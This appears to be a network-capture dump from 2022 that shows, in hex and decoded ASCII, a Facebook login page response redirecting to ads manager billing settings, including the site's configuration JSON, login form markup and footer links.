                                                                                                                                  Data Ascii: ifest_origin":null,"be_one_ahead":false,"is_rtl":false,"is_comet":false,"is_experimental_tier":false,"is_jit_warmed_up":true,"hsi":"7155575413255861252","semr_host_bucket":"3","bl_hash_version":2,"skip_rd_bl":true,"comet_env":0,"wbloks_env":false,"spin":4
                                                                                                                                  2022-10-17 20:07:09 UTC347INData Raw: 41 44 53 5f 50 4c 41 43 45 4d 45 4e 54 5f 46 49 58 5f 50 55 42 4c 49 53 48 45 52 5f 50 4c 41 54 46 4f 52 4d 53 5f 4d 55 54 41 54 49 4f 4e 22 2c 22 46 4f 52 43 45 5f 46 45 54 43 48 5f 42 4f 4f 53 54 45 44 5f 43 4f 4d 50 4f 4e 45 4e 54 5f 41 46 54 45 52 5f 41 44 53 5f 43 52 45 41 54 49 4f 4e 22 2c 22 56 49 44 45 4f 5f 44 49 4d 45 4e 53 49 4f 4e 53 5f 46 52 4f 4d 5f 50 4c 41 59 45 52 5f 49 4e 5f 55 50 4c 4f 41 44 5f 44 49 41 4c 4f 47 22 2c 22 53 4e 49 56 59 5f 47 52 4f 55 50 5f 42 59 5f 45 56 45 4e 54 5f 54 52 41 43 45 5f 49 44 5f 41 4e 44 5f 4e 41 4d 45 22 2c 22 41 44 53 5f 53 54 4f 52 45 5f 56 49 53 49 54 53 5f 4d 45 54 52 49 43 53 5f 44 45 50 52 45 43 41 54 49 4f 4e 22 2c 22 41 44 5f 44 52 41 46 54 5f 45 4e 41 42 4c 45 5f 53 59 4e 43 52 48 4f 4e 4f 55 53
                                                                                                                                  Data Ascii: ADS_PLACEMENT_FIX_PUBLISHER_PLATFORMS_MUTATION","FORCE_FETCH_BOOSTED_COMPONENT_AFTER_ADS_CREATION","VIDEO_DIMENSIONS_FROM_PLAYER_IN_UPLOAD_DIALOG","SNIVY_GROUP_BY_EVENT_TRACE_ID_AND_NAME","ADS_STORE_VISITS_METRICS_DEPRECATION","AD_DRAFT_ENABLE_SYNCRHONOUS
                                                                                                                                  2022-10-17 20:07:09 UTC349INData Raw: 61 6e 64 6f 22 3a 74 72 75 65 7d 2c 32 39 31 35 5d 2c 5b 22 43 6f 6f 6b 69 65 43 6f 72 65 4c 6f 67 67 69 6e 67 43 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 22 6d 61 78 69 6d 75 6d 49 67 6e 6f 72 61 62 6c 65 53 74 61 6c 6c 4d 73 22 3a 31 36 2e 36 37 2c 22 73 61 6d 70 6c 65 52 61 74 65 22 3a 39 2e 37 65 2d 35 2c 22 73 61 6d 70 6c 65 52 61 74 65 43 6c 61 73 73 69 63 22 3a 31 2e 30 65 2d 31 30 2c 22 73 61 6d 70 6c 65 52 61 74 65 46 61 73 74 53 74 61 6c 65 22 3a 31 2e 30 65 2d 38 7d 2c 33 34 30 31 5d 2c 5b 22 49 6d 6d 65 64 69 61 74 65 49 6d 70 6c 65 6d 65 6e 74 61 74 69 6f 6e 45 78 70 65 72 69 6d 65 6e 74 73 22 2c 5b 5d 2c 7b 22 70 72 65 66 65 72 5f 6d 65 73 73 61 67 65 5f 63 68 61 6e 6e 65 6c 22 3a 74 72 75 65 7d 2c 33 34 31 39 5d 2c 5b 22 44 54 53 47 49 6e 69 74 44
                                                                                                                                  Data Ascii: ando":true},2915],["CookieCoreLoggingConfig",[],{"maximumIgnorableStallMs":16.67,"sampleRate":9.7e-5,"sampleRateClassic":1.0e-10,"sampleRateFastStale":1.0e-8},3401],["ImmediateImplementationExperiments",[],{"prefer_message_channel":true},3419],["DTSGInitD
                                                                                                                                  2022-10-17 20:07:09 UTC350INData Raw: 35 34 30 5d 2c 5b 22 42 69 67 50 69 70 65 45 78 70 65 72 69 6d 65 6e 74 73 22 2c 5b 5d 2c 7b 22 6c 69 6e 6b 5f 69 6d 61 67 65 73 5f 74 6f 5f 70 61 67 65 6c 65 74 73 22 3a 66 61 6c 73 65 2c 22 65 6e 61 62 6c 65 5f 62 69 67 70 69 70 65 5f 70 6c 75 67 69 6e 73 22 3a 66 61 6c 73 65 7d 2c 39 30 37 5d 2c 5b 22 49 6e 74 6c 56 61 72 69 61 74 69 6f 6e 48 6f 6c 64 6f 75 74 22 2c 5b 5d 2c 7b 22 64 69 73 61 62 6c 65 5f 76 61 72 69 61 74 69 6f 6e 22 3a 66 61 6c 73 65 7d 2c 36 35 33 33 5d 2c 5b 22 41 73 79 6e 63 52 65 71 75 65 73 74 43 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 22 72 65 74 72 79 4f 6e 4e 65 74 77 6f 72 6b 45 72 72 6f 72 22 3a 22 31 22 2c 22 75 73 65 46 65 74 63 68 53 74 72 65 61 6d 41 6a 61 78 50 69 70 65 54 72 61 6e 73 70 6f 72 74 22 3a 66 61 6c 73 65 7d 2c 33
                                                                                                                                  Data Ascii: 540],["BigPipeExperiments",[],{"link_images_to_pagelets":false,"enable_bigpipe_plugins":false},907],["IntlVariationHoldout",[],{"disable_variation":false},6533],["AsyncRequestConfig",[],{"retryOnNetworkError":"1","useFetchStreamAjaxPipeTransport":false},3
                                                                                                                                  2022-10-17 20:07:09 UTC352INData Raw: 41 70 70 49 6e 76 69 74 65 73 4a 53 44 69 61 6c 6f 67 5c 2f 22 3a 30 2c 22 5c 2f 63 6f 6e 6e 65 63 74 5c 2f 6a 73 64 69 61 6c 6f 67 5c 2f 4d 50 6c 61 74 66 6f 72 6d 4f 41 75 74 68 53 68 69 6d 4a 53 44 69 61 6c 6f 67 5c 2f 22 3a 30 2c 22 5c 2f 63 6f 6e 6e 65 63 74 5c 2f 6a 73 64 69 61 6c 6f 67 5c 2f 4d 50 6c 61 74 66 6f 72 6d 4c 69 6b 65 4a 53 44 69 61 6c 6f 67 5c 2f 22 3a 30 2c 22 5c 2f 71 70 5c 2f 69 6e 74 65 72 73 74 69 74 69 61 6c 5c 2f 22 3a 31 2c 22 5c 2f 71 70 5c 2f 61 63 74 69 6f 6e 5c 2f 72 65 64 69 72 65 63 74 5c 2f 22 3a 31 2c 22 5c 2f 71 70 5c 2f 61 63 74 69 6f 6e 5c 2f 63 6c 6f 73 65 5c 2f 22 3a 31 2c 22 5c 2f 7a 65 72 6f 5c 2f 73 75 70 70 6f 72 74 5c 2f 69 6e 65 6c 69 67 69 62 6c 65 5c 2f 22 3a 31 2c 22 5c 2f 7a 65 72 6f 5f 62 61 6c 61 6e 63
                                                                                                                                  Data Ascii: AppInvitesJSDialog\/":0,"\/connect\/jsdialog\/MPlatformOAuthShimJSDialog\/":0,"\/connect\/jsdialog\/MPlatformLikeJSDialog\/":0,"\/qp\/interstitial\/":1,"\/qp\/action\/redirect\/":1,"\/qp\/action\/close\/":1,"\/zero\/support\/ineligible\/":1,"\/zero_balanc
                                                                                                                                  2022-10-17 20:07:09 UTC353INData Raw: 6e 2e 70 68 70 22 3a 31 2c 22 5c 2f 6c 6f 67 69 6e 5c 2f 22 3a 31 2c 22 5c 2f 6d 6f 62 69 6c 65 5c 2f 61 63 63 6f 75 6e 74 5c 2f 22 3a 31 2c 22 5c 2f 6e 5c 2f 22 3a 31 2c 22 5c 2f 72 65 6d 6f 74 65 5f 74 65 73 74 5f 64 65 76 69 63 65 5c 2f 22 3a 31 2c 22 5c 2f 75 70 73 65 6c 6c 5c 2f 62 75 79 5c 2f 22 3a 31 2c 22 5c 2f 75 70 73 65 6c 6c 5c 2f 62 75 79 63 6f 6e 66 69 72 6d 5c 2f 22 3a 31 2c 22 5c 2f 75 70 73 65 6c 6c 5c 2f 62 75 79 72 65 73 75 6c 74 5c 2f 22 3a 31 2c 22 5c 2f 75 70 73 65 6c 6c 5c 2f 70 72 6f 6d 6f 73 5c 2f 22 3a 31 2c 22 5c 2f 75 70 73 65 6c 6c 5c 2f 63 6f 6e 74 69 6e 75 65 5c 2f 22 3a 31 2c 22 5c 2f 75 70 73 65 6c 6c 5c 2f 68 5c 2f 70 72 6f 6d 6f 73 5c 2f 22 3a 31 2c 22 5c 2f 75 70 73 65 6c 6c 5c 2f 6c 6f 61 6e 5c 2f 6c 65 61 72 6e 6d 6f
                                                                                                                                  Data Ascii: n.php":1,"\/login\/":1,"\/mobile\/account\/":1,"\/n\/":1,"\/remote_test_device\/":1,"\/upsell\/buy\/":1,"\/upsell\/buyconfirm\/":1,"\/upsell\/buyresult\/":1,"\/upsell\/promos\/":1,"\/upsell\/continue\/":1,"\/upsell\/h\/promos\/":1,"\/upsell\/loan\/learnmo
                                                                                                                                  2022-10-17 20:07:09 UTC355INData Raw: 65 72 54 69 6d 65 44 61 74 61 22 2c 5b 5d 2c 7b 22 73 65 72 76 65 72 54 69 6d 65 22 3a 31 36 36 36 30 33 37 32 32 39 35 30 38 2c 22 74 69 6d 65 4f 66 52 65 71 75 65 73 74 53 74 61 72 74 22 3a 31 36 36 36 30 33 37 32 32 39 34 38 37 2e 33 2c 22 74 69 6d 65 4f 66 52 65 73 70 6f 6e 73 65 53 74 61 72 74 22 3a 31 36 36 36 30 33 37 32 32 39 34 38 37 2e 33 7d 2c 35 39 34 33 5d 2c 5b 22 46 62 74 51 54 4f 76 65 72 72 69 64 65 73 22 2c 5b 5d 2c 7b 22 6f 76 65 72 72 69 64 65 73 22 3a 7b 7d 7d 2c 35 35 31 5d 2c 5b 22 41 6e 61 6c 79 74 69 63 73 43 6f 72 65 44 61 74 61 22 2c 5b 5d 2c 7b 22 64 65 76 69 63 65 5f 69 64 22 3a 22 24 5e 7c 41 63 59 71 6e 33 36 33 50 74 36 4f 44 70 64 66 54 67 36 77 56 5f 71 46 4c 77 74 36 6b 6f 65 6d 72 2d 63 57 54 58 69 37 76 65 61 64 5a 2d
                                                                                                                                  Data Ascii: erTimeData",[],{"serverTime":1666037229508,"timeOfRequestStart":1666037229487.3,"timeOfResponseStart":1666037229487.3},5943],["FbtQTOverrides",[],{"overrides":{}},551],["AnalyticsCoreData",[],{"device_id":"$^|AcYqn363Pt6ODpdfTg6wV_qFLwt6koemr-cWTXi7veadZ-
                                                                                                                                  2022-10-17 20:07:09 UTC356INData Raw: 6e 73 69 74 69 6f 6e 73 42 6c 75 65 22 5d 2c 7b 22 5f 5f 72 63 22 3a 5b 22 73 65 74 49 6e 74 65 72 76 61 6c 41 63 72 6f 73 73 54 72 61 6e 73 69 74 69 6f 6e 73 42 6c 75 65 22 2c 22 41 61 33 42 34 38 74 6f 30 75 41 44 70 6a 51 36 42 75 76 34 63 45 66 53 76 6c 6a 77 51 69 6b 6b 53 71 6b 62 54 5a 37 57 36 47 6e 52 48 49 52 41 58 69 4c 77 45 55 6e 4f 35 36 69 68 47 6c 45 62 50 64 37 35 50 45 78 33 37 76 53 6f 33 61 59 78 7a 61 4f 50 6f 67 7a 4c 5a 62 34 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 39 38 36 36 33 33 22 2c 5b 22 73 65 74 54 69 6d 65 6f 75 74 41 63 72 6f 73 73 54 72 61 6e 73 69 74 69 6f 6e 73 42 6c 75 65 22 5d 2c 7b 22 5f 5f 72 63 22 3a 5b 22 73 65 74 54 69 6d 65 6f 75 74 41 63 72 6f 73 73 54 72 61 6e 73 69 74 69 6f 6e 73 42 6c 75 65 22 2c 22 41 61 33
                                                                                                                                  Data Ascii: nsitionsBlue"],{"__rc":["setIntervalAcrossTransitionsBlue","Aa3B48to0uADpjQ6Buv4cEfSvljwQikkSqkbTZ7W6GnRHIRAXiLwEUnO56ihGlEbPd75PEx37vSo3aYxzaOPogzLZb4"]},-1],["cr:986633",["setTimeoutAcrossTransitionsBlue"],{"__rc":["setTimeoutAcrossTransitionsBlue","Aa3
                                                                                                                                  2022-10-17 20:07:09 UTC357INData Raw: 50 6f 69 6e 74 65 72 4d 6f 76 65 22 3a 31 30 30 30 30 2c 22 6b 65 79 64 6f 77 6e 22 3a 30 2e 31 2c 22 63 6c 69 63 6b 22 3a 30 2e 30 32 2c 22 6d 6f 75 73 65 75 70 22 3a 30 2e 30 32 2c 22 5f 5f 31 30 30 6d 73 22 3a 30 2e 30 30 31 2c 22 5f 5f 64 65 66 61 75 6c 74 22 3a 35 30 30 30 2c 22 5f 5f 6d 69 6e 22 3a 31 30 30 2c 22 5f 5f 69 6e 74 65 72 61 63 74 69 6f 6e 44 65 66 61 75 6c 74 22 3a 32 30 30 2c 22 5f 5f 65 76 65 6e 74 44 65 66 61 75 6c 74 22 3a 31 30 30 30 30 30 7d 2c 22 70 61 67 65 5f 73 61 6d 70 6c 69 6e 67 5f 62 6f 6f 73 74 22 3a 31 2c 22 69 6e 74 65 72 61 63 74 69 6f 6e 5f 72 65 67 65 78 65 73 22 3a 7b 7d 2c 22 69 6e 74 65 72 61 63 74 69 6f 6e 5f 62 6f 6f 73 74 22 3a 7b 7d 2c 22 65 76 65 6e 74 5f 74 79 70 65 73 22 3a 7b 7d 2c 22 6d 61 6e 75 61 6c 5f
                                                                                                                                  Data Ascii: PointerMove":10000,"keydown":0.1,"click":0.02,"mouseup":0.02,"__100ms":0.001,"__default":5000,"__min":100,"__interactionDefault":200,"__eventDefault":100000},"page_sampling_boost":1,"interaction_regexes":{},"interaction_boost":{},"event_types":{},"manual_
                                                                                                                                  2022-10-17 20:07:09 UTC359INData Raw: 35 61 20 62 5f 63 33 70 79 6e 2d 61 68 68 20 63 68 72 6f 6d 65 20 77 65 62 6b 69 74 20 77 69 6e 20 78 31 20 4c 6f 63 61 6c 65 5f 65 6e 5f 55 53 22 20 64 69 72 3d 22 6c 74 72 22 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6e 6f 6e 63 65 3d 22 42 67 54 73 38 71 46 4d 22 3e 72 65 71 75 69 72 65 4c 61 7a 79 28 5b 22 62 6f 6f 74 73 74 72 61 70 57 65 62 53 65 73 73 69 6f 6e 22 5d 2c 66 75 6e 63 74 69 6f 6e 28 6a 29 7b 6a 28 31 36 36 36 30 33 37 32 32 39 29 7d 29 3c 2f 73 63 72 69 70 74 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 5f 6c 69 22 20 69 64 3d 22 75 5f 30 5f 30 5f 6f 6b 22 3e 3c 64 69 76 20 69 64 3d 22 67 6c 6f 62 61 6c 43 6f 6e 74 61 69 6e 65 72 22 20 63 6c 61 73 73 3d 22 75 69 43 6f 6e 74 65 78 74 75 61
                                                                                                                                  Data Ascii: 5a b_c3pyn-ahh chrome webkit win x1 Locale_en_US" dir="ltr"><script type="text/javascript" nonce="BgTs8qFM">requireLazy(["bootstrapWebSession"],function(j){j(1666037229)})</script><div class="_li" id="u_0_0_ok"><div id="globalContainer" class="uiContextua
                                                                                                                                  2022-10-17 20:07:09 UTC360INData Raw: 65 3d 22 68 69 64 64 65 6e 22 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 6f 66 66 22 20 69 64 3d 22 64 69 73 70 6c 61 79 22 20 6e 61 6d 65 3d 22 64 69 73 70 6c 61 79 22 20 76 61 6c 75 65 3d 22 22 20 2f 3e 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 6f 66 66 22 20 69 64 3d 22 69 73 70 72 69 76 61 74 65 22 20 6e 61 6d 65 3d 22 69 73 70 72 69 76 61 74 65 22 20 76 61 6c 75 65 3d 22 22 20 2f 3e 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 6f 66 66 22 20 69 64 3d 22 72 65 74 75 72 6e 5f 73 65 73 73 69 6f 6e 22 20 6e 61 6d 65 3d 22 72 65 74 75 72 6e 5f 73 65 73 73 69 6f 6e 22 20 76 61 6c 75 65 3d 22 22 20 2f 3e 3c 69 6e 70 75 74 20 74 79 70
                                                                                                                                  Data Ascii: e="hidden" autocomplete="off" id="display" name="display" value="" /><input type="hidden" autocomplete="off" id="isprivate" name="isprivate" value="" /><input type="hidden" autocomplete="off" id="return_session" name="return_session" value="" /><input typ
                                                                                                                                  2022-10-17 20:07:09 UTC362INData Raw: 78 6b 74 22 3e 3c 62 75 74 74 6f 6e 20 76 61 6c 75 65 3d 22 31 22 20 63 6c 61 73 73 3d 22 5f 34 32 66 74 20 5f 34 6a 79 30 20 5f 35 32 65 30 20 5f 34 6a 79 36 20 5f 34 6a 79 31 20 73 65 6c 65 63 74 65 64 20 5f 35 31 73 79 22 20 69 64 3d 22 6c 6f 67 69 6e 62 75 74 74 6f 6e 22 20 6e 61 6d 65 3d 22 6c 6f 67 69 6e 22 20 74 61 62 69 6e 64 65 78 3d 22 30 22 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 3e 4c 6f 67 20 49 6e 3c 2f 62 75 74 74 6f 6e 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 5f 78 6b 76 20 66 73 6d 20 66 77 6e 20 66 63 67 22 20 69 64 3d 22 6c 6f 67 69 6e 5f 6c 69 6e 6b 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 72 65 63 6f 76 65 72 2f 69 6e 69 74 69 61 74 65 2f 3f 61 72 73
                                                                                                                                  Data Ascii: xkt"><button value="1" class="_42ft _4jy0 _52e0 _4jy6 _4jy1 selected _51sy" id="loginbutton" name="login" tabindex="0" type="submit">Log In</button></div><div class="_xkv fsm fwn fcg" id="login_link"><a href="https://www.facebook.com/recover/initiate/?ars
                                                                                                                                  2022-10-17 20:07:09 UTC363INData Raw: 72 79 7b 62 26 26 21 62 2e 76 61 6c 75 65 3f 62 2e 66 6f 63 75 73 28 29 3a 63 26 26 63 2e 66 6f 63 75 73 28 29 7d 63 61 74 63 68 28 61 29 7b 69 66 28 21 28 61 2e 6e 75 6d 62 65 72 3d 3d 2d 32 31 34 36 38 32 36 31 37 38 29 29 74 68 72 6f 77 20 61 7d 72 65 74 75 72 6e 20 61 26 26 61 2e 63 61 6c 6c 28 77 69 6e 64 6f 77 29 7d 7d 28 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 29 3b 66 75 6e 63 74 69 6f 6e 20 70 6f 70 28 61 29 7b 77 69 6e 64 6f 77 2e 6f 70 65 6e 28 61 29 7d 66 75 6e 63 74 69 6f 6e 20 72 65 6c 6f 61 64 5f 6f 6e 5f 6e 65 77 5f 63 6f 6f 6b 69 65 28 61 29 7b 66 75 6e 63 74 69 6f 6e 20 62 28 61 29 7b 61 3d 6e 65 77 20 52 65 67 45 78 70 28 61 2b 22 3d 28 2e 2a 3f 29 28 3b 7c 24 29 22 29 3b 72 65 74 75 72 6e 20 61 2e 74 65 73 74 28 64 6f 63 75 6d 65 6e 74
                                                                                                                                  Data Ascii: ry{b&&!b.value?b.focus():c&&c.focus()}catch(a){if(!(a.number==-2146826178))throw a}return a&&a.call(window)}}(window.onload);function pop(a){window.open(a)}function reload_on_new_cookie(a){function b(a){a=new RegExp(a+"=(.*?)(;|$)");return a.test(document
                                                                                                                                  2022-10-17 20:07:09 UTC365INData Raw: 6f 6d 25 32 46 61 64 73 25 32 46 6d 61 6e 61 67 65 72 25 32 46 61 63 63 6f 75 6e 74 5f 73 65 74 74 69 6e 67 73 25 32 46 61 63 63 6f 75 6e 74 5f 62 69 6c 6c 69 6e 67 22 20 6f 6e 63 6c 69 63 6b 3d 22 72 65 71 75 69 72 65 28 26 71 75 6f 74 3b 49 6e 74 6c 55 74 69 6c 73 26 71 75 6f 74 3b 29 2e 73 65 74 43 6f 6f 6b 69 65 4c 6f 63 61 6c 65 28 26 71 75 6f 74 3b 66 72 5f 46 52 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 65 6e 5f 55 53 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 66 72 2d 66 72 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 6c 6f 67 69 6e 2e 70 68 70 3f 6e 65 78 74 3d 68 74 74 70 73 5c 75 30 30 32 35 33 41 5c 75 30 30 32 35 32 46 5c 75 30 30 32 35 32 46 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 75 30 30 32 35 32 46
                                                                                                                                  Data Ascii: om%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;fr_FR&quot;, &quot;en_US&quot;, &quot;https:\/\/fr-fr.facebook.com\/login.php?next=https\u00253A\u00252F\u00252Fwww.facebook.com\u00252F
                                                                                                                                  2022-10-17 20:07:09 UTC366INData Raw: 73 73 3d 22 5f 73 76 34 22 20 64 69 72 3d 22 6c 74 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 71 2d 61 6c 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 6c 6f 67 69 6e 2e 70 68 70 3f 6e 65 78 74 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 25 32 46 61 64 73 25 32 46 6d 61 6e 61 67 65 72 25 32 46 61 63 63 6f 75 6e 74 5f 73 65 74 74 69 6e 67 73 25 32 46 61 63 63 6f 75 6e 74 5f 62 69 6c 6c 69 6e 67 22 20 6f 6e 63 6c 69 63 6b 3d 22 72 65 71 75 69 72 65 28 26 71 75 6f 74 3b 49 6e 74 6c 55 74 69 6c 73 26 71 75 6f 74 3b 29 2e 73 65 74 43 6f 6f 6b 69 65 4c 6f 63 61 6c 65 28 26 71 75 6f 74 3b 73 71 5f 41 4c 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 65 6e 5f 55 53 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 68 74
                                                                                                                                  Data Ascii: ss="_sv4" dir="ltr" href="https://sq-al.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;sq_AL&quot;, &quot;en_US&quot;, &quot;ht
                                                                                                                                  2022-10-17 20:07:09 UTC368INData Raw: 6c 73 65 3b 22 20 74 69 74 6c 65 3d 22 54 75 72 6b 69 73 68 22 3e 54 c3 bc 72 6b c3 a7 65 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 5f 73 76 34 22 20 64 69 72 3d 22 72 74 6c 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 72 2d 61 72 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 6c 6f 67 69 6e 2e 70 68 70 3f 6e 65 78 74 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 25 32 46 61 64 73 25 32 46 6d 61 6e 61 67 65 72 25 32 46 61 63 63 6f 75 6e 74 5f 73 65 74 74 69 6e 67 73 25 32 46 61 63 63 6f 75 6e 74 5f 62 69 6c 6c 69 6e 67 22 20 6f 6e 63 6c 69 63 6b 3d 22 72 65 71 75 69 72 65 28 26 71 75 6f 74 3b 49 6e 74 6c 55 74 69 6c 73 26 71 75 6f 74 3b 29 2e 73 65 74 43 6f 6f 6b 69 65 4c 6f 63 61
                                                                                                                                  Data Ascii: lse;" title="Turkish">Trke</a></li><li><a class="_sv4" dir="rtl" href="https://ar-ar.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" onclick="require(&quot;IntlUtils&quot;).setCookieLoca
                                                                                                                                  2022-10-17 20:07:09 UTC369INData Raw: 6f 75 6e 74 5f 62 69 6c 6c 69 6e 67 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 77 77 77 5f 6c 69 73 74 5f 73 65 6c 65 63 74 6f 72 26 71 75 6f 74 3b 2c 20 39 29 3b 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 20 74 69 74 6c 65 3d 22 53 69 6d 70 6c 69 66 69 65 64 20 43 68 69 6e 65 73 65 20 28 43 68 69 6e 61 29 22 3e e4 b8 ad e6 96 87 28 e7 ae 80 e4 bd 93 29 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 72 6f 6c 65 3d 22 62 75 74 74 6f 6e 22 20 63 6c 61 73 73 3d 22 5f 34 32 66 74 20 5f 34 6a 79 30 20 5f 35 31 37 69 20 5f 35 31 37 68 20 5f 35 31 73 79 22 20 72 65 6c 3d 22 64 69 61 6c 6f 67 22 20 61 6a 61 78 69 66 79 3d 22 2f 73 65 74 74 69 6e 67 73 2f 6c 61 6e 67 75 61 67 65 2f 6c 61 6e 67 75 61 67 65 2f 3f 75 72 69 3d 68 74 74 70 73 25 33 41 25 32 46 25 32
                                                                                                                                  Data Ascii: ount_billing&quot;, &quot;www_list_selector&quot;, 9); return false;" title="Simplified Chinese (China)">()</a></li><li><a role="button" class="_42ft _4jy0 _517i _517h _51sy" rel="dialog" ajaxify="/settings/language/language/?uri=https%3A%2F%2
                                                                                                                                  2022-10-17 20:07:09 UTC371INData Raw: 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 4f 63 75 6c 75 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 6f 72 74 61 6c 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 22 20 74 69 74 6c 65 3d 22 4c 65 61 72 6e 20 6d 6f 72 65 20 61 62 6f 75 74 20 46 61 63 65 62 6f 6f 6b 20 50 6f 72 74 61 6c 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 50 6f 72 74 61 6c 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6c 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 6c 2e 70 68 70 3f 75 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 69 6e 73 74 61 67 72 61 6d 2e 63 6f 6d 25 32 46 26 61 6d 70 3b 68 3d 41 54 33 62 73 5f 33 62 33 6f 72 6f 70 61 69 4e 69 7a 48 69 68 4b 31
                                                                                                                                  Data Ascii: target="_blank">Oculus</a></li><li><a href="https://portal.facebook.com/" title="Learn more about Facebook Portal" target="_blank">Portal</a></li><li><a href="https://l.facebook.com/l.php?u=https%3A%2F%2Fwww.instagram.com%2F&amp;h=AT3bs_3b3oropaiNizHihK1
                                                                                                                                  2022-10-17 20:07:09 UTC372INData Raw: 6c 69 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 65 76 65 6c 6f 70 65 72 73 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 3f 72 65 66 3d 70 66 22 20 74 69 74 6c 65 3d 22 44 65 76 65 6c 6f 70 20 6f 6e 20 6f 75 72 20 70 6c 61 74 66 6f 72 6d 2e 22 3e 44 65 76 65 6c 6f 70 65 72 73 0d 0a
                                                                                                                                  Data Ascii: li><a href="https://developers.facebook.com/?ref=pf" title="Develop on our platform.">Developers
                                                                                                                                  2022-10-17 20:07:09 UTC372INData Raw: 36 66 38 38 0d 0a 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 63 61 72 65 65 72 73 2f 3f 72 65 66 3d 70 66 22 20 74 69 74 6c 65 3d 22 4d 61 6b 65 20 79 6f 75 72 20 6e 65 78 74 20 63 61 72 65 65 72 20 6d 6f 76 65 20 74 6f 20 6f 75 72 20 61 77 65 73 6f 6d 65 20 63 6f 6d 70 61 6e 79 2e 22 3e 43 61 72 65 65 72 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 64 61 74 61 2d 6e 6f 63 6f 6f 6b 69 65 73 3d 22 31 22 20 68 72 65 66 3d 22 2f 70 72 69 76 61 63 79 2f 70 6f 6c 69 63 79 2f 3f 65 6e 74 72 79 5f 70 6f 69 6e 74 3d 66 61 63 65 62 6f 6f 6b 5f 70 61 67 65 5f 66 6f 6f 74 65 72 22 20 74 69 74 6c 65 3d 22 4c 65 61 72 6e 20 61 62 6f 75 74 20 79 6f 75 72 20 70 72 69 76 61 63 79 20 61 6e 64 20 46 61 63 65 62 6f 6f 6b 2e 22 3e 50 72 69 76
                                                                                                                                  Data Ascii: 6f88</a></li><li><a href="/careers/?ref=pf" title="Make your next career move to our awesome company.">Careers</a></li><li><a data-nocookies="1" href="/privacy/policy/?entry_point=facebook_page_footer" title="Learn about your privacy and Facebook.">Priv
